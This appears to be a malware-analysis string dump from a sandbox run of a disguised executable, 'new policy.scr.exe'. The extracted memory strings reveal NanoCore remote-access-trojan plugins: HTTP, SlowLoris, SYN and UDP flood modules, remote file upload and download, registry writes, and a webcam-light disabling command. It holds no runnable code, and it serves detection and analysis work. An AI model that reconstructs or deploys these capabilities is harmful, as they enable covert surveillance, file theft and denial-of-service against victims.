Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHand
leTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywo
rdAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Class10gdelegate0_0gclass0_0gstruct0_0gclass1_0gclass2_0gclass3_0class9_0smethod_0type_0contextValue_0string_0ulong_0bool_0gparam_0cultureInfo_0lastInputInfo_0stringBuilder_0resourceManager_0timer_0uintptr_0memoryStatus_0object_0uint_0ushort_0iclientDataHost_0iclientNetworkHost_0iclientAppHost_0GDelegate0GClass0GStruct0Class11gdelegate0_1class1_1smethod_1string_1ulong_1bool_1cultureInfo_1intptr_1object_1uint_1Class1`1IEnumerable`1ContextValue`1IEnumerator`1List`1GClass1Class12Int32class1_2smethod_2ulong_2intptr_2int_2KeyValuePair`2Dictionary`2GClass2Class13class1_3smethod_3GClass3Class14smethod_4Class4Class15method_5Class5Class16method_6Class6Class17method_7Class7Class18method_8Class8Class19method_9Class9<Module>System.IOTvalue__GetFirstRunDataProjectDatamscorlibSystem.Collections.GenericMicrosoft.VisualBasicGetWindowThreadProcessIdGetProcessByIdAddConnectionStateChangedConnectionFailedPipeClosedPipeCreatedget_BytesReceivedSynchronizedCoreCommandSystemCommandConnectionCommandRoundGetMethodmethodNetworkInterfaceStackTraceCreateInstancedefaultInstanceDivideGetHashCodeget_UnicodeAddRangeChangeBuildingHostCacheEndInvokeBeginInvokeIDisposableRuntimeMethodHandleGetModuleHandleRuntimeTypeHandleGetTypeFromHandleGetProcessHandleToSingleAvailablePageFileTotalPageFileset_WindowStyleProcessWindowStyleget_NameGetApplicationExecutableNameGetClientExecutableNameGetRandomFileNameGetFileNameget_FullNameget_ProcessNameGetNameAssemblyNameGetApplicationFriendlyNameGetClientFriendlyNameStackFrameGetFrameDateTimeOneCombineCommandTypeCheckForSyncLockOnValueTypeget_DeclaringTypeNanoCoreMethodBaseApplicationBaseApplicationSettingsBaseDisposeUpdateMulticastDelegateEditorBrowsableStateCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitle
AttributeStandardModuleAttributeHideModuleNameAttributeAssemblyTrademarkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeMyGroupCollectionAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeCLSCompliantAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteget_Valueset_ValueLookupPrivilegeValueGetObjectValueGetValueMoveRemoveget_SizeInitializeSizeOfSystem.ThreadingEncodingToStringMathget_ExecutablePathGetTempPathobjAsyncCallbackTimerCallbackcallbackIClientNetworkTotalPhysicalAvailablePhsyicalMarshalDecimalMicrosoft.VisualBasic.MyServices.InternalAvailableVirtualTotalVirtualAvailableExVirtualSystem.ComponentModelHandleConnectionCommandUninstalladvapi32.dllkernel32.dlluser32.dllCoreClientPlugin.dllObjectFlowControlget_Itemset_ItemSystemEnumBooleanget_MetadataTokenOpenProcessTokenGetPublicKeyTokenMinNanoCore.ClientPluginCoreClientPluginGetIsRunningAsAdminApplicationSystem.Net.NetworkInformationUnicastIPAddressInformationSystem.ConfigurationSystem.GlobalizationSystem.ReflectionUnicastIPAddressInformationCollectionIClientNameObject
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignH
elpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownlo
adUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFile
VersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHand
leTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: Class10gdelegate0_0gclass0_0gstruct0_0gclass1_0gclass2_0gclass3_0class9_0smethod_0type_0contextValue_0string_0ulong_0bool_0gparam_0cultureInfo_0lastInputInfo_0stringBuilder_0resourceManager_0timer_0uintptr_0memoryStatus_0object_0uint_0ushort_0iclientDataHost_0iclientNetworkHost_0iclientAppHost_0GDelegate0GClass0GStruct0Class11gdelegate0_1class1_1smethod_1string_1ulong_1bool_1cultureInfo_1intptr_1object_1uint_1Class1`1IEnumerable`1ContextValue`1IEnumerator`1List`1GClass1Class12Int32class1_2smethod_2ulong_2intptr_2int_2KeyValuePair`2Dictionary`2GClass2Class13class1_3smethod_3GClass3Class14smethod_4Class4Class15method_5Class5Class16method_6Class6Class17method_7Class7Class18method_8Class8Class19method_9Class9<Module>System.IOTvalue__GetFirstRunDataProjectDatamscorlibSystem.Collections.GenericMicrosoft.VisualBasicGetWindowThreadProcessIdGetProcessByIdAddConnectionStateChangedConnectionFailedPipeClosedPipeCreatedget_BytesReceivedSynchronizedCoreCommandSystemCommandConnectionCommandRoundGetMethodmethodNetworkInterfaceStackTraceCreateInstancedefaultInstanceDivideGetHashCodeget_UnicodeAddRangeChangeBuildingHostCacheEndInvokeBeginInvokeIDisposableRuntimeMethodHandleGetModuleHandleRuntimeTypeHandleGetTypeFromHandleGetProcessHandleToSingleAvailablePageFileTotalPageFileset_WindowStyleProcessWindowStyleget_NameGetApplicationExecutableNameGetClientExecutableNameGetRandomFileNameGetFileNameget_FullNameget_ProcessNameGetNameAssemblyNameGetApplicationFriendlyNameGetClientFriendlyNameStackFrameGetFrameDateTimeOneCombineCommandTypeCheckForSyncLockOnValueTypeget_DeclaringTypeNanoCoreMethodBaseApplicationBaseApplicationSettingsBaseDisposeUpdateMulticastDelegateEditorBrowsableStateCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitle
AttributeStandardModuleAttributeHideModuleNameAttributeAssemblyTrademarkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeMyGroupCollectionAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeCLSCompliantAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteget_Valueset_ValueLookupPrivilegeValueGetObjectValueGetValueMoveRemoveget_SizeInitializeSizeOfSystem.ThreadingEncodingToStringMathget_ExecutablePathGetTempPathobjAsyncCallbackTimerCallbackcallbackIClientNetworkTotalPhysicalAvailablePhsyicalMarshalDecimalMicrosoft.VisualBasic.MyServices.InternalAvailableVirtualTotalVirtualAvailableExVirtualSystem.ComponentModelHandleConnectionCommandUninstalladvapi32.dllkernel32.dlluser32.dllCoreClientPlugin.dllObjectFlowControlget_Itemset_ItemSystemEnumBooleanget_MetadataTokenOpenProcessTokenGetPublicKeyTokenMinNanoCore.ClientPluginCoreClientPluginGetIsRunningAsAdminApplicationSystem.Net.NetworkInformationUnicastIPAddressInformationSystem.ConfigurationSystem.GlobalizationSystem.ReflectionUnicastIPAddressInformationCollectionIClientNameObject
Source: new policy.scr.exe, 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywo
rdAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: new policy.scr.exe, 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSi